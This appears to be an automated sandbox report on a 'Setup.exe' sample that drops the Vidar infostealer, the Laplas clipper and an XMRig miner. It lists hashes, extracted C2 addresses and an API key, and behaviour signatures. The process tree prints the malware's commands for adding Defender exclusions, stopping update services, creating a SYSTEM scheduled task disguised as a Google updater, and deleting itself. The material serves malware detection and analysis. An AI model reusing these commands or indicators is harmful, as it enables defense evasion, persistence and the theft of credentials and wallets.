Analysis
-
max time kernel
134s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
04-04-2023 13:36
General
-
Target
Setup.exe
-
Size
1023.0MB
-
MD5
ef8d846aec55eddbbfa2472f9d66c2e7
-
SHA1
7e75e159b0a62a62d8d775b6dcd4682b59122c28
-
SHA256
d9a7ab42bcc0d232c84718ef977a0addc3bd7efd184970e88c6f5b85f03c27b1
-
SHA512
791f226bcda1ab1ec0cbaba03ea00ee56325bffbc3b0ee8dd6010d86cc4190c4e8054422e9a1fd9955b42366cb06ebedd0c49ad8b3ed13d17398d23b63fa0314
-
SSDEEP
196608:4+hMmu0Vro/dFqg4cF3VjgY7lEGpDltGgC891SWAo0G:41m3OMEljl7lPftGgPuDr
Malware Config
Extracted
vidar
3.3
49bd1304650cc9c7f3f131428d9e16c2
https://steamcommunity.com/profiles/76561199492257783
https://t.me/justsometg
-
profile_id_v2
49bd1304650cc9c7f3f131428d9e16c2
-
user_agent
Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Extracted
laplas
http://45.159.189.105
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 63 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Setup.exeC:\Users\Admin\AppData\Local\Temp\Setup.exe3⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\18651826726180352056.exe"C:\ProgramData\18651826726180352056.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\18651826726180352056.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵
-
C:\ProgramData\09299959774274074556.exe"C:\ProgramData\09299959774274074556.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\09299959774274074556.exeC:\ProgramData\09299959774274074556.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQA1AA==7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeC:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe7⤵
-
C:\ProgramData\56107315853083771435.exe"C:\ProgramData\56107315853083771435.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Setup.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rxejhfcm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\Program Files\Google\Chrome\updater.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\09299959774274074556.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\09299959774274074556.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\09299959774274074556.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\09299959774274074556.exeFilesize
5.9MB
MD5aa57f0d7a099773175006624cc891b29
SHA144598d94dac6e9c72ffe65f9e17cf77c2c73e6fe
SHA2566227df9ce53429b024cb2fa118a7a735ec1c048117cb1a46247e92f1b839814f
SHA512e0fff8e7d8de1dc5b3d84bdea90828f9739499183aabb11eb5b7600af132f8fa0569bc49d4ca21ec5df925482ec2149d0134a88a4e8a632cb0326444a6bc31b0
-
C:\ProgramData\18651826726180352056.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\18651826726180352056.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\18651826726180352056.exeFilesize
13.9MB
MD50abca5a76379dc774f4c133a177cde59
SHA15c7c48d7f3fea2c5e5f950cf83492cda82fda838
SHA25659a16f9faf29768ed027a33dced3dc1cd61c4be814b59070b3ce79e34bb6b963
SHA512dd3176ce1e26992be85022a0a9825520496d20a3a7d09b44a4ddedc05511668411f16733efcb82f80f105fef94c2bfa59f9fe908ef281de65f585a1448b668c7
-
C:\ProgramData\56107315853083771435.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\56107315853083771435.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\56107315853083771435.exeFilesize
9.9MB
MD56fa2a8de3fc30b9c80d12c2ac4ad2e3f
SHA132fd7a00979b4ec01c031fdfbf12677529e6c4fa
SHA256a2c59381ca2fdba45f345eec78681fc417271e2f3fb65ff9ec06998d90abc9fd
SHA5129c51ac0abcab4b8e40b476dbb8e7aaff7a6057caf07756a1a846193bf9d4924fbe0f3f0847237029ecb6f840f658eb41fe43bb89dc7c74be6727c3ee12fe953e
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5f39d3c5975feb9c06ef0604241d49f4c
SHA10a4b0cbff8372154e2ee23df5f38b2a4917ff737
SHA2564407818257d34e1aeb8ca1676a2281652617ff96a28a3739d5564951f3975ccf
SHA512e516a03b4eebb84e134da53d567ca962a9b7d9039d34d4aead4bcabbc7c2a25fc3a5da50cd945bf9a7f88c445dd50298f6b25179feb99bccb8009fc7e4cc744a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5cc0d493ffbd49825ad190f68dc298bc2
SHA1ed5f7844c90c8455ac2220fdd7d56d37f4061bac
SHA256f86c351278225249fb950f27bff2105659b6b257471a721d87f3833b3c80b9ce
SHA51271aa97deff0cd4d9f0467336bf0d323bfed4814ef704f135c451dc195d43c0c049108d8eb4edd9512cd97e5172a4a51dbb503fe4168b8abf76e83dd754cccb16
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5a6685e02d4224799097fe9c6627fb607
SHA1ec2d18e25513a559eed359a82c0d99e81ff41d54
SHA256a5090285f71bb4d53010b60b446726b9257b54271c6f2e7d708ec78e335e15a9
SHA5125e3111b2bcd3020d00d793ae3df269737ac3648d6374e18629860c455a023700f53effbc31bd3d6b5f359811de0f51a38eda248e5fd652675e6337b18cf2969e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5ec42654a9f0be1ebe4a46463f7f45006
SHA1d86dc640e167a0e3ffc0589b5fbb477abefd6eb5
SHA256ff45e61a5c06feeab456460d90a71a15e0f062f983b2b4a0f153e2b4a88ddbca
SHA5122c9957c34491983fbc0fb22d9e31ce88ce4c0f4763da9c04902f36f863b18994f8618dd24174cbf7ec3f0827b4b56913a37463fb94fdb4bba9a7e2b11f7eaacd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5ec42654a9f0be1ebe4a46463f7f45006
SHA1d86dc640e167a0e3ffc0589b5fbb477abefd6eb5
SHA256ff45e61a5c06feeab456460d90a71a15e0f062f983b2b4a0f153e2b4a88ddbca
SHA5122c9957c34491983fbc0fb22d9e31ce88ce4c0f4763da9c04902f36f863b18994f8618dd24174cbf7ec3f0827b4b56913a37463fb94fdb4bba9a7e2b11f7eaacd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttgepltg.dll.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
309.4MB
MD52fa1f2c032aba5edf0e530b629314c3f
SHA1aaeadbdc478c1d66643923d7c09f1a6f92b31472
SHA25642861be44feeabc8e17b104b0185066f70c4b51e3ffcd8e0481cc30e7defa24a
SHA512287f668694c03e17fc10ce226d93173cd4795d1afcd8bd1b2d0a8f6c0aa22ef51e7c24eaf9e2f10213629b3a3d01630ecd1d1afa9d15284465739b644161229e
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
315.5MB
MD567202fd00d6706bac286cacb89a731f2
SHA1107c69d2040fb1d8d767edaebaa2cc812923b4bc
SHA256b4f5a2207acdf6d7df5943ce5c4717513689f047cab90b61b628c482cae77f0b
SHA512272f49718637c12ccb946c2df8c5369e6373b83b086a7dee05b36a0df7e62c29dd398d485ac8d78419b1872712302afd04d4bcf83891f427ff9b402a0d1ad5ca
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
42.2MB
MD5eda1f7b8b9e8a5e321eb42de3e09e898
SHA1c528c955638b56193d50f63040b7f2fbab63e4dc
SHA2569b5ef91505209976d717c11c6c68f3730e32c73bb64fa06b352de7c301a37cd1
SHA51240451e90f7e59400810a7e756578e0cb5bbb993263e1b3b52a04496d5acd55187458ecdc72cfa8bd6397b43d63d340844b3b26337b693dde26408a5457bc59fd
-
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exeFilesize
40.5MB
MD56016ca40fe17dbac2539f422067acee6
SHA1848385fb90a545ae27813c01a15b7138ec0dead6
SHA2563aff954e8153ebc9d5c3c1cda87c424c71cc0a3005c499497be5ed06cc9a14be
SHA51299f3ba67dea7775feacd084b9a6df0d4974a10bc21c19636c4c2bf85575b193c99fd3f629c64867d1d956df25c2bd56f1445115d46e89faa5f64cfdca0aa0a72
-
C:\Windows\System32\drivers\etc\hostsFilesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/424-319-0x000001F975330000-0x000001F975352000-memory.dmpFilesize
136KB
-
memory/424-329-0x000001F975540000-0x000001F975550000-memory.dmpFilesize
64KB
-
memory/424-340-0x000001F977100000-0x000001F97711C000-memory.dmpFilesize
112KB
-
memory/424-342-0x000001F977120000-0x000001F977128000-memory.dmpFilesize
32KB
-
memory/424-343-0x000001F977130000-0x000001F97713A000-memory.dmpFilesize
40KB
-
memory/424-341-0x000001F9770F0000-0x000001F9770FA000-memory.dmpFilesize
40KB
-
memory/424-330-0x000001F975540000-0x000001F975550000-memory.dmpFilesize
64KB
-
memory/424-328-0x000001F975540000-0x000001F975550000-memory.dmpFilesize
64KB
-
memory/748-474-0x0000022AF46C0000-0x0000022AF46E0000-memory.dmpFilesize
128KB
-
memory/748-487-0x00007FF673E40000-0x00007FF67462F000-memory.dmpFilesize
7.9MB
-
memory/932-317-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/932-316-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/932-311-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/932-312-0x0000000005360000-0x0000000005370000-memory.dmpFilesize
64KB
-
memory/1552-139-0x0000000006100000-0x0000000006110000-memory.dmpFilesize
64KB
-
memory/1552-137-0x00000000065F0000-0x0000000006612000-memory.dmpFilesize
136KB
-
memory/1552-158-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/1552-136-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/1552-135-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/1552-172-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/1552-133-0x0000000000CF0000-0x00000000017F8000-memory.dmpFilesize
11.0MB
-
memory/1552-160-0x0000000006100000-0x0000000006110000-memory.dmpFilesize
64KB
-
memory/1968-408-0x000001D7AE270000-0x000001D7AE280000-memory.dmpFilesize
64KB
-
memory/1968-436-0x000001D7AFE10000-0x000001D7AFE16000-memory.dmpFilesize
24KB
-
memory/1968-397-0x000001D7AE270000-0x000001D7AE280000-memory.dmpFilesize
64KB
-
memory/1968-418-0x000001D7AFBB0000-0x000001D7AFBCC000-memory.dmpFilesize
112KB
-
memory/1968-419-0x000001D7AE260000-0x000001D7AE26A000-memory.dmpFilesize
40KB
-
memory/1968-429-0x00007FF48D090000-0x00007FF48D0A0000-memory.dmpFilesize
64KB
-
memory/1968-435-0x000001D7AFE30000-0x000001D7AFE4A000-memory.dmpFilesize
104KB
-
memory/2084-486-0x00007FF6A4770000-0x00007FF6A479A000-memory.dmpFilesize
168KB
-
memory/2140-315-0x00007FF6897F0000-0x00007FF68A1D5000-memory.dmpFilesize
9.9MB
-
memory/2140-373-0x00007FF6897F0000-0x00007FF68A1D5000-memory.dmpFilesize
9.9MB
-
memory/3440-314-0x0000000002590000-0x00000000025A0000-memory.dmpFilesize
64KB
-
memory/3440-287-0x0000000000060000-0x00000000002A8000-memory.dmpFilesize
2.3MB
-
memory/3440-291-0x0000000002590000-0x00000000025A0000-memory.dmpFilesize
64KB
-
memory/3800-278-0x0000000000BB0000-0x0000000001A00000-memory.dmpFilesize
14.3MB
-
memory/3856-466-0x00007FF79A460000-0x00007FF79AE45000-memory.dmpFilesize
9.9MB
-
memory/3856-407-0x00007FF79A460000-0x00007FF79AE45000-memory.dmpFilesize
9.9MB
-
memory/3856-475-0x00007FF79A460000-0x00007FF79AE45000-memory.dmpFilesize
9.9MB
-
